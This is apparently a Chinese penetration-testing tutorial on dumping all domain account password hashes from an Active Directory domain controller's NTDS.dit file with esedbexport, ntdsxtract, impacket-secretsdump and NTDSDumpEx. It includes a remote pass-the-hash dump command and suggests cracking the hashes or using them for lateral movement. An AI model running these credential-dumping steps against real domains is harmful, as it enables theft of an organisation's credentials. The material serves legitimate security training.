攻击域控丝滑小连招~

news2024/11/27 12:51:34

点击星标,即时接收最新推文

9e350f86098a3d9014e63bceec342574.png

如果已经获得本地管理员账号或是域管理员账号,那么下一个目标通常是域控制器,对于渗透测试人员来说,光荣与荣耀的那一刻就是成功从域控制器提取所有的哈希值。但即使是拥有管理员权限,也无法读取域控制器中存储的c:\Windows\NTDS\ntds.dit文件,因为活动目录始终访问这个文件,所有文件被禁止读出。下面介绍几种常用提取ntds.dit的方法。

01

使用esedbexport恢复ntds.dit

将从目标系统导出的ntds.dit放在本地Linux机器中进行解析,本次实验环境为Kail2.0。

在Kali中打开命令行输入命令下载libesedb。

wget
https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz

首先安装工具依赖环境,如图6-24所示,输入如下命令。

$ sudo apt-get install autoconf automake autopoint libtool pkg-config

51ffd13926ff6115f1d88a74a4a7f3e8.png

图6-24安装工具依赖环境

将下载好的libesedb进行编译安装,依次输入命令:

$ ./configure
$ make
$ sudo make install
$ sudo ldconfig

安装成功后会在系统/usr/local/bin中出现esedbexport程序,如图6-25所示。

70c7d9b2fa51a1ed4c3c93f67eb2b76c.png

图6-25查看esedbexport是否安装成功

在Kali中打开命令行进入存放ntds.dit目录中,使用esedbexport 恢复,输入如下命令来提取表信息,如图6-26所示,恢复时间视ntds.dit大小决定,导出成功会在同目录生成一个文件夹。这里的存储信息,我们只需要datatable和link_table。

esedbexport -m tables ntds.dit

8b1584ac527f8e5a63d80da77ae4e109.png

图6-26使用esedbexport 打开ntds.dit

可以看到成功导出,如图6-27所示。

7474aedef572102b39c1e2d3dc2e7e9b.png

图6-27查看被打开后的ntds.dit内容

再下载使用ntdsxtract进行提取域信息,导出Hash。

下载,在Kali输入命令:

$ git clone https://github.com/csababarta/ntdsxtract.git

安装,在Kali输入命令:

python setup.py build && python setup.py install

然后将导出ntds.dit.export文件夹和SYSTEM文件一并放入ntdsxtract文件夹中,输入如下命令。

$ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user.txt

成功将域内所有用户信息及Hash导出到all_user.txt中,如图6-28所示。

dda0bb3bf82a5dd8c3cff53ba10b0cd2.png

图6-28导出与内所有用户和Hash信息

导出到Hash可以放在在线网站破解,也可以本地使用hashcat进行破解或在域内直接进行PTH进行横向渗透。

Tips:ntds.dit中包含域内所有信息,不仅仅包括用户和Hash,也可以通过分析ntds.dit导出域内计算机信息或其他信息,如:

dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv

该命令可以执行导出域内所有计算机信息,导出为csv格式,方便查看,如图6-29所示。

24a6c7cdaf93e9b1b4387a4a290cfc98.png

图6-29导出域内所有计算机信息

02

使用impacket工具包导出Hash

使用impacket工具包中的secretsdump 解析ntds.dit文件,导出Hash。

首先下载impacket工具包,在Kali下,输入如下命令下载该工具。

git clone https://github.com/CoreSecurity/impacket.git

下载成功后,将impacket工具包安装在Kali上,impacket是基于使用Python编写的,Kail默认安装了Python,直接输入命令,如图6-30所示。

python setup.py install

c682d6b656013a6aa1d78c5568511c79.png

图6-30安装impacket

成功安装后,打开命令行进入ntds.dit和SYSTEM目录,输入如下命令,成功导出ntds.dit中所有Hash,如图6-31所示。

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

197889a302df92b84e1740cad6e55303.png

图6-31使用impacket-secretsdump导出用户和Hash

Tips:impacket还可以直接使用用户名和Hash进行验证,从远程域控制器读取ntds.dit转储域Hash,如图6-32所示:

impacket-secretsdump-hashes
aad3b435b51404eeaad3b435b51404ee:135d82f03c3698e2e32bcb11f4da741b -just-dc pentest.com/administrator@192.168.100.205

519f02328997dc6496a9dff6a453dacc.png

图6-32使用impacket-secretsdump向DC获取信息

03

Windows下解析ntds.dit导出域账号及域Hash

使用NTDSDumpex.exe进行导出Hash操作。NTDSDumpex.exe下载地址:

https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip

首先将ntds.dit、SYSTEM和NTDSDumpex.exe放在同一目录中,打开cmd输入如下命令,域账号及域Hash被成功导出,如图6-33所示。

NTDSDumpex.exe -d ntds.dit -s system

09fa892dffbb4af5737839a6d147e169.png

图6-33使用NTDSDumpex.exe打开ntds.dit

6f9be887f2e06ae03d846464b8787a75.gif

MS08067安全实验室视频号已上线

欢迎各位同学关注转发~

—  实验室旗下直播培训课程  —

d18a1e439a43ef22b5bc97f93f0b77aa.png

8959e3bb385acaa8bf52b30d4fc043c8.jpeg

71c6a02fdbcefd3ff4d8902a0d2040cc.jpegf3117d9b7f23e358d8cb749922176afe.png

531b2a81cf8e25c6843ce5a3c7365054.jpeg

73c99cfce9fbfd827bb89cf4220d0b43.jpeg

0b325963fd1f28fe8996cde68a4c115f.jpeg

7b100e89704daef8912837d8d11895c4.jpeg

783e02d5af5930d78dbf1ab2c9bfdcac.jpeg


和20000+位同学加入MS08067一起学习

a7479b91e1855f3ac26f9f830c2eb724.gif

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1170318.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

windows10编译高版本openssl

参考文章 参考文章中的windows编译为低版本,在高版本的openssl编译中已经没有:“ms\do_ms.bat”这个脚本了,现记录下编译过程 1、准备工作 安装ActivePerl,安装后会自动写入环境变量,参照参考文章测试安装成功与否&a…

封装element-table合计行Hooks方法

背景: 在我们常做的后台管理系统中,经常的会遇到关于表格合计行的计算以及显示,如下图,我们采用的是element框架这一套 封装: 由于考虑到该需求是最常见的,每个中心可能都会涉及到,我们封装公共方法&#…

解决方案中word中分节符的使用

解决方案中必不可少的两个“符号”,分页符,分节符 有了分节符,可以为不同节设置不同的页眉页脚、分栏格式、纸张大小及方向、页边距、不同节间采用不同的页码序号,常用的功能主要是把word下一次的由原来的“竖版”,变…

pygame游戏编程库:初始化和显示(01/8)

一、说明 pygame是一个Python库,用于编写2D游戏和多媒体应用程序。它提供了一整套工具,可以帮助开发者创建图像、声音、动画等内容,并与用户进行交互。pygame还可以用于创建交互式教育软件、演示文稿、音乐应用程序等。它基于SDL库&#xff0…

线程锁、进程锁、分布式锁_Linux网络编程

线程锁 1、互斥锁:互斥锁首先是一个睡眠锁,如下图当线程C没有获取到资源时,线程锁会结束线程B切换到线程C。 2、自旋锁:而自旋锁在未获取到资源时线程C循环等待,尝试获取锁,一直占用核心。 3、读写锁:若一…

css基础之实现轮播图

原理介绍 图片轮播的原理是通过控制显示和隐藏不同的图片来实现图像的切换,从而创建连续播放的效果。用到的知识点有定位和定时器。 实现步骤: HTML 结构: 首先,需要在HTML中创建一个包含轮播图片的容器,通常使用 &l…

采用springboot、avue框架开发的:大型医院绩效考核系统成品源码

医院绩效考核系统全套源码(演示自主版权医院应用案例) 医院绩效考核系统,建立以医院发展目标为导向,以医务人员劳动价值、工作量为评价基础,统筹效率、质量、成本的绩效管理和绩效工资分配体系。系统支持RBRVS&#xf…

0003Java安卓程序设计-springboot基于Android的学习生活交流APP

文章目录 **摘** **要**目 录系统设计开发环境 编程技术交流、源码分享、模板分享、网课教程 🐧裙:776871563 摘 要 网络的广泛应用给生活带来了十分的便利。所以把学习生活交流管理与现在网络相结合,利用java技术建设学习生活交流APP&…

python机器学习——实现Kmeans算法

K-means算法 关于K-means算法,它是一种无监督学习算法,用于将数据集分成预定数量的簇(clusters)。 K-means算法比较适合用来做聚类分析,而不是用来预测,换句话来说,K-means算法不擅长预测 K-…

基于SSM的搬家预约系统

末尾获取源码 开发语言:Java Java开发工具:JDK1.8 后端框架:SSM 前端:Vue 数据库:MySQL5.7和Navicat管理工具结合 服务器:Tomcat8.5 开发软件:IDEA / Eclipse 是否Maven项目:是 目录…

数据结构之堆的实现(图解➕源代码)

一、堆的定义 首先明确堆是一种特殊的完全二叉树,分为大根堆和小根堆,接下来我们就分别介绍一下这两种不同的堆。 1.1 大根堆(简称:大堆) 在大堆里面:父节点的值 ≥ 孩子节点的值 我们的兄弟节点没有限制&…

“利用Lazada API揭秘电商数据:一键获取海量商品评论列表!“

要使用Lazada API获取Lazada商品评论列表,您需要先注册Lazada开发者账号并获取授权码和密钥。然后,通过调用Lazada API的item_comments接口,传入商品ID和国家域名后缀,即可获取到商品的评论列表。 以下是使用Lazada API获取Lazad…

4+1视图的理解和使用

软件架构 原文: Architectural Blueprints—The “41” View Model of Software Architecture 老外的原文还是很值得一看的,互联网上的很多文章理解得都比较粗浅 什么是软件架构?面试的时候很多面试官可能会问你最近在做的项目的架构。其实这…

uniapp原生插件之安卓TCP原生插件

插件介绍 安卓TCP插件支持自定义心跳数据,自定义心跳时间,断开连接时返回自定义数据等 插件地址 安卓TCP原生插件 - DCloud 插件市场 超级福利 uniapp 插件购买超级福利 详细使用文档 uniapp 安卓TCP原生插件使用文档 用法 在需要使用插件…

Nginx反向代理(入门)

前言 反向代理 --> 服务器 Nginx反向代理是一种服务器架构模式,通过将客户端的请求转发给后端服务器来分担服务器的负载压力,同时提高了系统的可用性和灵活性。它是一种常用的应用程序负载均衡技术,通常被用来处理大量同时连接的Web请求…

【GEE】2、探索数据集

1简介 在本单元中,我们将讨论以下概念: Google 地球引擎中可用的潜在数据来源。 通过生态示例显示的数据集采样用例。 如何使用 Google 地球引擎访问重要的元数据。 2背景 要将遥感集成到您的研究和分析中,学习如何解析 Google 地球引擎上…

【Linux编译器】:gcc/g++的使用

朋友们、伙计们,我们又见面了,本期来给大家解读一下有关Linux编译器gcc/g的使用,如果看完之后对你有一定的启发,那么请留下你的三连,祝大家心想事成! C 语 言 专 栏:C语言:从入门到精…

“01”滴答“摩尔斯电码”加密解密单个字符

“01”替换滴嗒“.-”“摩尔斯电码”字符,加密解密键盘输入的单个字符。 (本笔记适合熟悉循环和列表的 coder 翻阅) 【学习的细节是欢悦的历程】 Python 官网:https://www.python.org/ Free:大咖免费“圣经”教程《 python 完全自学教程》&a…

Windows 时间服务配置和配置工具

文章目录 Windows 时间服务保留Portw32tm 命令配置 Windows 时间服务配置客户端使用两个时间服务器配置客户端自动从域源同步时间检查客户端时间配置使用本地组策略编辑器配置Windows 时间注册表参考推荐阅读 Windows 时间服务 (W32Time) 为 Active Directory 域服务 (AD DS) 管…

【ReentrantLock源码分析】非公平锁的加锁和解锁

一、AbstractQueuedSynchronized 的三个核心成员变量 阐述一下 AQS 中的三个核心成员变量,后面源码分析流程的时候很多地方有。 state:表示锁的状态,0表示锁未被锁定,大于0的话表示重入锁的次数。state 成员变量被 volatile 修饰…